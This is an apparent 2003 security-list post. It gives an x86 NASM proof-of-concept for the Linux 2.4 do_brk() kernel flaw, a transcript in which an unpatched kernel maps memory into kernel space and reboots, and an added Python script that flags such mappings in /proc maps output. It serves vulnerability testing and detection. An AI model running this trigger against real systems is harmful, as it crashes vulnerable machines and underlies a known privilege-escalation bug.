`
The following program can be used to test if an x86 Linux system
is vulnerable to the do_brk() exploit; use at your own risk.
$ nasm brk_poc.asm -o a.out
$ chmod 755 a.out
$ uname -a
Linux test3 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1698
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out
c0000000-c0003000 rwxp 00000000 00:00 0
(system reboots when the program exits)
$ uname -a
Linux test3 2.4.23 #1 Mon Dec 1 22:18:25 CET 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1591
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out
(the program exits gracefully)
$ cat brk_poc.asm
; ref.: http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html
BITS 32
        org     0xBFFFF000

ehdr:                                   ; Elf32_Ehdr
        db      0x7F, "ELF", 1, 1, 1    ; e_ident
        times 9 db 0
        dw      2                       ; e_type (ET_EXEC)
        dw      3                       ; e_machine (EM_386)
        dd      1                       ; e_version
        dd      _start                  ; e_entry
        dd      phdr - $$               ; e_phoff
        dd      0                       ; e_shoff
        dd      0                       ; e_flags
        dw      ehdrsize                ; e_ehsize
        dw      phdrsize                ; e_phentsize
        dw      1                       ; e_phnum
        dw      0                       ; e_shentsize
        dw      0                       ; e_shnum
        dw      0                       ; e_shstrndx
ehdrsize equ    $ - ehdr

phdr:                                   ; Elf32_Phdr
        dd      1                       ; p_type (PT_LOAD)
        dd      0                       ; p_offset
        dd      $$                      ; p_vaddr
        dd      $$                      ; p_paddr
        dd      filesize                ; p_filesz
        dd      0x4000                  ; p_memsz
        dd      7                       ; p_flags (read, write, execute)
        dd      0x1000                  ; p_align
phdrsize equ    $ - phdr

_start:
        mov     eax, 162                ; sys_nanosleep
        mov     ebx, timespec           ; sleep for 20 seconds
        int     0x80
        mov     eax, 1                  ; sys_exit
        mov     ebx, 0                  ; exit status 0
        int     0x80

timespec dd     20,0                    ; tv_sec = 20, tv_nsec = 0
filesize equ    $ - $$
--
Christophe Devine - http://www.cr0.net:8040/about/
`
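The two /proc/<pid>/maps listings in the transcript above differ in one line: only the 2.4.22 kernel shows a mapping above c0000000. The following check is an added example, not part of the original post; it flags any mapping that extends past the user address-space limit. The names TASK_SIZE and kernel_range_mappings are chosen here, the limit assumes the default 3G/1G split on 32-bit x86, and the sample inputs are the map lines copied from the transcript.

```python
import re

# Assumption: default 3G/1G split on 32-bit x86, so user space ends at 0xC0000000.
TASK_SIZE = 0xC0000000

# Fields of a maps line: start-end perms offset dev inode [path]
MAPS_LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+([rwxsp-]{4})\s+[0-9a-f]+\s+"
    r"[0-9a-f]+:[0-9a-f]+\s+\d+\s*(.*)$",
    re.IGNORECASE,
)

def parse_maps(text):
    """Yield (start, end, perms, path) for each well-formed maps line."""
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if not m:
            continue  # skip blank or malformed lines
        start, end = int(m.group(1), 16), int(m.group(2), 16)
        if end > start:
            yield start, end, m.group(3), m.group(4)

def kernel_range_mappings(text, limit=TASK_SIZE):
    """Return the mappings (or parts of mappings) that lie at or above limit."""
    findings = []
    for start, end, perms, path in parse_maps(text):
        if end > limit:
            over_start = max(start, limit)
            findings.append({
                "start": over_start,
                "end": end,
                "perms": perms,
                "path": path or "[anonymous]",
                "bytes_over": end - over_start,
            })
    return findings

# Map lines copied from the transcript in the post (2.4.22-10mdk, then 2.4.23).
MAPS_2_4_22 = """bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out
c0000000-c0003000 rwxp 00000000 00:00 0
"""
MAPS_2_4_23 = """bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out
"""

if __name__ == "__main__":
    for name, maps in (("2.4.22", MAPS_2_4_22), ("2.4.23", MAPS_2_4_23)):
        hits = kernel_range_mappings(maps)
        print(name, "VULNERABLE" if hits else "ok", hits)
```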